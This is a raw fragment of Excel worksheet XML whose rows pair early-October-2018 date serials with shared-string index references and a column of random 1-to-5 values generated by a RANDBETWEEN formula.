    <row r="8950" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8950" s="1">
        <v>43375.29247685185</v>
      </c>
      <c r="C8950" t="s">
        <v>1130</v>
      </c>
      <c r="E8950" s="2" t="s">
        <v>7965</v>
      </c>
      <c r="F8950">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8951" s="1">
        <v>43375.274317129632</v>
      </c>
      <c r="C8951" t="s">
        <v>71</v>
      </c>
      <c r="E8951" t="s">
        <v>7966</v>
      </c>
      <c r="F8951">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8952" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8952" s="1">
        <v>43375.260914351849</v>
      </c>
      <c r="C8952" t="s">
        <v>535</v>
      </c>
      <c r="E8952" s="2" t="s">
        <v>7967</v>
      </c>
      <c r="F8952">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8953" s="1">
        <v>43375.239849537036</v>
      </c>
      <c r="C8953" t="s">
        <v>1408</v>
      </c>
      <c r="D8953" t="s">
        <v>56</v>
      </c>
      <c r="E8953" t="s">
        <v>7968</v>
      </c>
      <c r="F8953">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8954" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A8954" s="1">
        <v>43375.222141203703</v>
      </c>
      <c r="C8954" t="s">
        <v>48</v>
      </c>
      <c r="E8954" s="2" t="s">
        <v>7969</v>
      </c>
      <c r="F8954">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8955" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8955" s="1">
        <v>43375.210625</v>
      </c>
      <c r="C8955" t="s">
        <v>48</v>
      </c>
      <c r="E8955" s="2" t="s">
        <v>7970</v>
      </c>
      <c r="F8955">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8956" s="1">
        <v>43375.206261574072</v>
      </c>
      <c r="C8956" t="s">
        <v>97</v>
      </c>
      <c r="E8956" t="s">
        <v>7971</v>
      </c>
      <c r="F8956">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8957" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8957" s="1">
        <v>43375.198888888888</v>
      </c>
      <c r="C8957" t="s">
        <v>71</v>
      </c>
      <c r="E8957" s="2" t="s">
        <v>7972</v>
      </c>
      <c r="F8957">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8958" s="1">
        <v>43375.189699074072</v>
      </c>
      <c r="C8958" t="s">
        <v>97</v>
      </c>
      <c r="E8958" t="s">
        <v>7973</v>
      </c>
      <c r="F8958">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8959" s="1">
        <v>43375.181481481479</v>
      </c>
      <c r="C8959" t="s">
        <v>97</v>
      </c>
      <c r="D8959" t="s">
        <v>312</v>
      </c>
      <c r="E8959" t="s">
        <v>7974</v>
      </c>
      <c r="F8959">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8960" s="1">
        <v>43375.172754629632</v>
      </c>
      <c r="C8960" t="s">
        <v>140</v>
      </c>
      <c r="D8960" t="s">
        <v>312</v>
      </c>
      <c r="E8960" t="s">
        <v>7975</v>
      </c>
      <c r="F8960">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8961" s="1">
        <v>43375.089108796295</v>
      </c>
      <c r="C8961" t="s">
        <v>1440</v>
      </c>
      <c r="D8961" t="s">
        <v>20</v>
      </c>
      <c r="E8961" t="s">
        <v>4729</v>
      </c>
      <c r="F8961">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8962" s="1">
        <v>43375.022141203706</v>
      </c>
      <c r="C8962" t="s">
        <v>140</v>
      </c>
      <c r="D8962" t="s">
        <v>141</v>
      </c>
      <c r="E8962" t="s">
        <v>7976</v>
      </c>
      <c r="F8962">
        <f t="shared" ref="F8962:F9025" ca="1" si="140">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="8963" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8963" s="1">
        <v>43374.970300925925</v>
      </c>
      <c r="C8963" t="s">
        <v>314</v>
      </c>
      <c r="E8963" s="2" t="s">
        <v>7977</v>
      </c>
      <c r="F8963">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8964" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8964" s="1">
        <v>43374.947638888887</v>
      </c>
      <c r="C8964" t="s">
        <v>140</v>
      </c>
      <c r="D8964" t="s">
        <v>847</v>
      </c>
      <c r="E8964" s="2" t="s">
        <v>7978</v>
      </c>
      <c r="F8964">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8965" s="1">
        <v>43374.92292824074</v>
      </c>
      <c r="C8965" t="s">
        <v>41</v>
      </c>
      <c r="E8965" t="s">
        <v>7979</v>
      </c>
      <c r="F8965">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8966" s="1">
        <v>43374.828136574077</v>
      </c>
      <c r="C8966" t="s">
        <v>73</v>
      </c>
      <c r="E8966" t="s">
        <v>7980</v>
      </c>
      <c r="F8966">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8967" s="1">
        <v>43374.761250000003</v>
      </c>
      <c r="C8967" t="s">
        <v>82</v>
      </c>
      <c r="E8967" t="s">
        <v>7981</v>
      </c>
      <c r="F8967">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8968" s="1">
        <v>43374.751840277779</v>
      </c>
      <c r="C8968" t="s">
        <v>712</v>
      </c>
      <c r="E8968" t="s">
        <v>7982</v>
      </c>
      <c r="F8968">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8969" s="1">
        <v>43374.717858796299</v>
      </c>
      <c r="C8969" t="s">
        <v>10</v>
      </c>
      <c r="D8969" t="s">
        <v>6</v>
      </c>
      <c r="E8969" t="s">
        <v>7983</v>
      </c>
      <c r="F8969">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8970" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8970" s="1">
        <v>43374.699074074073</v>
      </c>
      <c r="C8970" t="s">
        <v>10</v>
      </c>
      <c r="D8970" t="s">
        <v>163</v>
      </c>
      <c r="E8970" s="2" t="s">
        <v>7984</v>
      </c>
      <c r="F8970">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8971" s="1">
        <v>43374.679074074076</v>
      </c>
      <c r="C8971" t="s">
        <v>10</v>
      </c>
      <c r="D8971" t="s">
        <v>17</v>
      </c>
      <c r="E8971" t="s">
        <v>7985</v>
      </c>
      <c r="F8971">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8972" s="1">
        <v>43374.654907407406</v>
      </c>
      <c r="C8972" t="s">
        <v>6</v>
      </c>
      <c r="D8972" t="s">
        <v>25</v>
      </c>
      <c r="E8972" t="s">
        <v>7986</v>
      </c>
      <c r="F8972">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8973" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8973" s="1">
        <v>43374.650254629632</v>
      </c>
      <c r="C8973" t="s">
        <v>6</v>
      </c>
      <c r="D8973" t="s">
        <v>25</v>
      </c>
      <c r="E8973" s="2" t="s">
        <v>7987</v>
      </c>
      <c r="F8973">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8974" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8974" s="1">
        <v>43374.616273148145</v>
      </c>
      <c r="C8974" t="s">
        <v>2140</v>
      </c>
      <c r="E8974" s="2" t="s">
        <v>7988</v>
      </c>
      <c r="F8974">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8975" s="1">
        <v>43374.603148148148</v>
      </c>
      <c r="C8975" t="s">
        <v>10</v>
      </c>
      <c r="D8975" t="s">
        <v>271</v>
      </c>
      <c r="E8975" t="s">
        <v>7989</v>
      </c>
      <c r="F8975">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8976" s="1">
        <v>43374.592638888891</v>
      </c>
      <c r="C8976" t="s">
        <v>10</v>
      </c>
      <c r="D8976" t="s">
        <v>17</v>
      </c>
      <c r="E8976" t="s">
        <v>7990</v>
      </c>
      <c r="F8976">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8977" s="1">
        <v>43374.587708333333</v>
      </c>
      <c r="C8977" t="s">
        <v>10</v>
      </c>
      <c r="D8977" t="s">
        <v>23</v>
      </c>
      <c r="E8977" t="s">
        <v>7991</v>
      </c>
      <c r="F8977">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8978" s="1">
        <v>43374.586099537039</v>
      </c>
      <c r="C8978" t="s">
        <v>10</v>
      </c>
      <c r="D8978" t="s">
        <v>56</v>
      </c>
      <c r="E8978" t="s">
        <v>7992</v>
      </c>
      <c r="F8978">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8979" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8979" s="1">
        <v>43374.583425925928</v>
      </c>
      <c r="C8979" t="s">
        <v>10</v>
      </c>
      <c r="D8979" t="s">
        <v>86</v>
      </c>
      <c r="E8979" s="2" t="s">
        <v>7993</v>
      </c>
      <c r="F8979">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8980" s="1">
        <v>43374.573449074072</v>
      </c>
      <c r="C8980" t="s">
        <v>10</v>
      </c>
      <c r="D8980" t="s">
        <v>178</v>
      </c>
      <c r="E8980" t="s">
        <v>7994</v>
      </c>
      <c r="F8980">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="8981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8981" s="1">
        <v>43374.569976851853</v>
      </c>
      <c r="C8981" t="s">
        <v>10</v>
      </c>
      <c r="D8981" t="s">
        <v>36</v>
      </c>
      <c r="E8981" t="s">
        <v>7995</v>
      </c>
      <c r="F8981">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8982" s="1">
        <v>43374.557696759257</v>
      </c>
      <c r="C8982" t="s">
        <v>6</v>
      </c>
      <c r="D8982" t="s">
        <v>25</v>
      </c>
      <c r="E8982" t="s">
        <v>7996</v>
      </c>
      <c r="F8982">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8983" s="1">
        <v>43374.550439814811</v>
      </c>
      <c r="C8983" t="s">
        <v>10</v>
      </c>
      <c r="D8983" t="s">
        <v>151</v>
      </c>
      <c r="E8983" t="s">
        <v>7997</v>
      </c>
      <c r="F8983">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8984" s="1">
        <v>43374.5390162037</v>
      </c>
      <c r="C8984" t="s">
        <v>10</v>
      </c>
      <c r="D8984" t="s">
        <v>263</v>
      </c>
      <c r="E8984" t="s">
        <v>7998</v>
      </c>
      <c r="F8984">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8985" s="1">
        <v>43374.535486111112</v>
      </c>
      <c r="C8985" t="s">
        <v>6</v>
      </c>
      <c r="D8985" t="s">
        <v>25</v>
      </c>
      <c r="E8985" t="s">
        <v>7999</v>
      </c>
      <c r="F8985">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8986" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8986" s="1">
        <v>43374.517731481479</v>
      </c>
      <c r="C8986" t="s">
        <v>140</v>
      </c>
      <c r="D8986" t="s">
        <v>141</v>
      </c>
      <c r="E8986" s="2" t="s">
        <v>8000</v>
      </c>
      <c r="F8986">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8987" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8987" s="1">
        <v>43374.497395833336</v>
      </c>
      <c r="C8987" t="s">
        <v>6</v>
      </c>
      <c r="D8987" t="s">
        <v>25</v>
      </c>
      <c r="E8987" s="2" t="s">
        <v>8001</v>
      </c>
      <c r="F8987">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8988" s="1">
        <v>43374.496423611112</v>
      </c>
      <c r="C8988" t="s">
        <v>10</v>
      </c>
      <c r="D8988" t="s">
        <v>46</v>
      </c>
      <c r="E8988" t="s">
        <v>8002</v>
      </c>
      <c r="F8988">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8989" s="1">
        <v>43374.493495370371</v>
      </c>
      <c r="C8989" t="s">
        <v>63</v>
      </c>
      <c r="E8989" t="s">
        <v>8003</v>
      </c>
      <c r="F8989">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8990" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8990" s="1">
        <v>43374.488275462965</v>
      </c>
      <c r="C8990" t="s">
        <v>10</v>
      </c>
      <c r="D8990" t="s">
        <v>89</v>
      </c>
      <c r="E8990" s="2" t="s">
        <v>8004</v>
      </c>
      <c r="F8990">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8991" s="1">
        <v>43374.476851851854</v>
      </c>
      <c r="C8991" t="s">
        <v>10</v>
      </c>
      <c r="D8991" t="s">
        <v>271</v>
      </c>
      <c r="E8991" t="s">
        <v>8005</v>
      </c>
      <c r="F8991">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8992" s="1">
        <v>43374.470335648148</v>
      </c>
      <c r="C8992" t="s">
        <v>48</v>
      </c>
      <c r="E8992" t="s">
        <v>8006</v>
      </c>
      <c r="F8992">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8993" s="1">
        <v>43374.460474537038</v>
      </c>
      <c r="C8993" t="s">
        <v>10</v>
      </c>
      <c r="D8993" t="s">
        <v>20</v>
      </c>
      <c r="E8993" t="s">
        <v>8007</v>
      </c>
      <c r="F8993">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8994" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8994" s="1">
        <v>43374.457858796297</v>
      </c>
      <c r="C8994" t="s">
        <v>43</v>
      </c>
      <c r="E8994" s="2" t="s">
        <v>8008</v>
      </c>
      <c r="F8994">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8995" s="1">
        <v>43374.455451388887</v>
      </c>
      <c r="C8995" t="s">
        <v>10</v>
      </c>
      <c r="D8995" t="s">
        <v>36</v>
      </c>
      <c r="E8995" t="s">
        <v>8009</v>
      </c>
      <c r="F8995">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="8996" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8996" s="1">
        <v>43374.449895833335</v>
      </c>
      <c r="C8996" t="s">
        <v>10</v>
      </c>
      <c r="D8996" t="s">
        <v>20</v>
      </c>
      <c r="E8996" s="2" t="s">
        <v>8010</v>
      </c>
      <c r="F8996">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="8997" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8997" s="1">
        <v>43374.447812500002</v>
      </c>
      <c r="C8997" t="s">
        <v>10</v>
      </c>
      <c r="D8997" t="s">
        <v>89</v>
      </c>
      <c r="E8997" s="2" t="s">
        <v>8011</v>
      </c>
      <c r="F8997">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="8998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8998" s="1">
        <v>43374.428136574075</v>
      </c>
      <c r="C8998" t="s">
        <v>48</v>
      </c>
      <c r="E8998" t="s">
        <v>8012</v>
      </c>
      <c r="F8998">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="8999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8999" s="1">
        <v>43374.42695601852</v>
      </c>
      <c r="C8999" t="s">
        <v>10</v>
      </c>
      <c r="D8999" t="s">
        <v>23</v>
      </c>
      <c r="E8999" t="s">
        <v>8013</v>
      </c>
      <c r="F8999">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="9000" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A9000" s="1">
        <v>43374.41337962963</v>
      </c>
      <c r="C9000" t="s">
        <v>71</v>
      </c>
      <c r="E9000" s="2" t="s">
        <v>8014</v>
      </c>
      <c r="F9000">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9001" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9001" s="1">
        <v>43374.395474537036</v>
      </c>
      <c r="C9001" t="s">
        <v>48</v>
      </c>
      <c r="E9001" s="2" t="s">
        <v>8015</v>
      </c>
      <c r="F9001">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="9002" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A9002" s="1">
        <v>43374.384479166663</v>
      </c>
      <c r="C9002" t="s">
        <v>48</v>
      </c>
      <c r="E9002" s="2" t="s">
        <v>8016</v>
      </c>
      <c r="F9002">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="9003" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A9003" s="1">
        <v>43374.360023148147</v>
      </c>
      <c r="C9003" t="s">
        <v>461</v>
      </c>
      <c r="E9003" s="2" t="s">
        <v>8017</v>
      </c>
      <c r="F9003">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="9004" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9004" s="1">
        <v>43374.3593287037</v>
      </c>
      <c r="C9004" t="s">
        <v>10</v>
      </c>
      <c r="D9004" t="s">
        <v>36</v>
      </c>
      <c r="E9004" s="2" t="s">
        <v>8018</v>
      </c>
      <c r="F9004">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="9005" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9005" s="1">
        <v>43374.347870370373</v>
      </c>
      <c r="C9005" t="s">
        <v>318</v>
      </c>
      <c r="E9005" s="2" t="s">
        <v>8019</v>
      </c>
      <c r="F9005">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9006" s="1">
        <v>43374.278344907405</v>
      </c>
      <c r="C9006" t="s">
        <v>41</v>
      </c>
      <c r="E9006" t="s">
        <v>8020</v>
      </c>
      <c r="F9006">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9007" s="1">
        <v>43374.27480324074</v>
      </c>
      <c r="C9007" t="s">
        <v>229</v>
      </c>
      <c r="E9007" t="s">
        <v>8021</v>
      </c>
      <c r="F9007">
        <f t="shared" ca="1" si="140"/>
        <v>4</v>
      </c>
    </row>
    <row r="9008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9008" s="1">
        <v>43374.234722222223</v>
      </c>
      <c r="C9008" t="s">
        <v>124</v>
      </c>
      <c r="E9008" t="s">
        <v>8022</v>
      </c>
      <c r="F9008">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="9009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9009" s="1">
        <v>43374.195104166669</v>
      </c>
      <c r="C9009" t="s">
        <v>686</v>
      </c>
      <c r="E9009" t="s">
        <v>8023</v>
      </c>
      <c r="F9009">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="9010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9010" s="1">
        <v>43374.163842592592</v>
      </c>
      <c r="C9010" t="s">
        <v>477</v>
      </c>
      <c r="E9010" t="s">
        <v>8024</v>
      </c>
      <c r="F9010">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9011" s="1">
        <v>43374.151990740742</v>
      </c>
      <c r="C9011" t="s">
        <v>41</v>
      </c>
      <c r="E9011" t="s">
        <v>8025</v>
      </c>
      <c r="F9011">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="9012" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9012" s="1">
        <v>43374.133437500001</v>
      </c>
      <c r="C9012" t="s">
        <v>41</v>
      </c>
      <c r="E9012" s="2" t="s">
        <v>8026</v>
      </c>
      <c r="F9012">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9013" s="1">
        <v>43374.128437500003</v>
      </c>
      <c r="C9013" t="s">
        <v>41</v>
      </c>
      <c r="E9013" t="s">
        <v>8027</v>
      </c>
      <c r="F9013">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="9014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9014" s="1">
        <v>43373.933263888888</v>
      </c>
      <c r="C9014" t="s">
        <v>73</v>
      </c>
      <c r="E9014" t="s">
        <v>8028</v>
      </c>
      <c r="F9014">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="9015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9015" s="1">
        <v>43373.846967592595</v>
      </c>
      <c r="C9015" t="s">
        <v>6</v>
      </c>
      <c r="D9015" t="s">
        <v>25</v>
      </c>
      <c r="E9015" t="s">
        <v>8029</v>
      </c>
      <c r="F9015">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="9016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9016" s="1">
        <v>43373.831331018519</v>
      </c>
      <c r="C9016" t="s">
        <v>253</v>
      </c>
      <c r="E9016" t="s">
        <v>4528</v>
      </c>
      <c r="F9016">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9017" s="1">
        <v>43373.639606481483</v>
      </c>
      <c r="C9017" t="s">
        <v>10</v>
      </c>
      <c r="D9017" t="s">
        <v>89</v>
      </c>
      <c r="E9017" t="s">
        <v>8030</v>
      </c>
      <c r="F9017">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="9018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9018" s="1">
        <v>43373.512824074074</v>
      </c>
      <c r="C9018" t="s">
        <v>10</v>
      </c>
      <c r="D9018" t="s">
        <v>80</v>
      </c>
      <c r="E9018" t="s">
        <v>8031</v>
      </c>
      <c r="F9018">
        <f t="shared" ca="1" si="140"/>
        <v>1</v>
      </c>
    </row>
    <row r="9019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9019" s="1">
        <v>43373.476793981485</v>
      </c>
      <c r="C9019" t="s">
        <v>16</v>
      </c>
      <c r="E9019" t="s">
        <v>8032</v>
      </c>
      <c r="F9019">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9020" s="1">
        <v>43373.448136574072</v>
      </c>
      <c r="C9020" t="s">
        <v>10</v>
      </c>
      <c r="D9020" t="s">
        <v>112</v>
      </c>
      <c r="E9020" t="s">
        <v>8033</v>
      </c>
      <c r="F9020">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="9021" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9021" s="1">
        <v>43373.425659722219</v>
      </c>
      <c r="C9021" t="s">
        <v>10</v>
      </c>
      <c r="D9021" t="s">
        <v>263</v>
      </c>
      <c r="E9021" s="2" t="s">
        <v>8034</v>
      </c>
      <c r="F9021">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9022" s="1">
        <v>43373.281597222223</v>
      </c>
      <c r="C9022" t="s">
        <v>724</v>
      </c>
      <c r="E9022" t="s">
        <v>8035</v>
      </c>
      <c r="F9022">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9023" s="1">
        <v>43373.09165509259</v>
      </c>
      <c r="C9023" t="s">
        <v>5020</v>
      </c>
      <c r="D9023" t="s">
        <v>17</v>
      </c>
      <c r="E9023" t="s">
        <v>6838</v>
      </c>
      <c r="F9023">
        <f t="shared" ca="1" si="140"/>
        <v>2</v>
      </c>
    </row>
    <row r="9024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9024" s="1">
        <v>43373.002233796295</v>
      </c>
      <c r="C9024" t="s">
        <v>82</v>
      </c>
      <c r="D9024" t="s">
        <v>107</v>
      </c>
      <c r="E9024" t="s">
        <v>8036</v>
      </c>
      <c r="F9024">
        <f t="shared" ca="1" si="140"/>
        <v>3</v>
      </c>
    </row>
    <row r="9025" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9025" s="1">
        <v>43372.985474537039</v>
      </c>
      <c r="C9025" t="s">
        <v>318</v>
      </c>
      <c r="E9025" s="2" t="s">
        <v>8037</v>
      </c>
      <c r="F9025">
        <f t="shared" ca="1" si="140"/>
        <v>5</v>
      </c>
    </row>
    <row r="9026" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9026" s="1">
        <v>43372.922997685186</v>
      </c>
      <c r="C9026" t="s">
        <v>144</v>
      </c>
      <c r="E9026" s="2" t="s">
        <v>8038</v>
      </c>
      <c r="F9026">
        <f t="shared" ref="F9026:F9089" ca="1" si="141">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="9027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9027" s="1">
        <v>43372.698310185187</v>
      </c>
      <c r="C9027" t="s">
        <v>471</v>
      </c>
      <c r="D9027" t="s">
        <v>336</v>
      </c>
      <c r="E9027" t="s">
        <v>8039</v>
      </c>
      <c r="F9027">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9028" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9028" s="1">
        <v>43372.584872685184</v>
      </c>
      <c r="C9028" t="s">
        <v>97</v>
      </c>
      <c r="D9028" t="s">
        <v>713</v>
      </c>
      <c r="E9028" s="2" t="s">
        <v>8040</v>
      </c>
      <c r="F9028">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
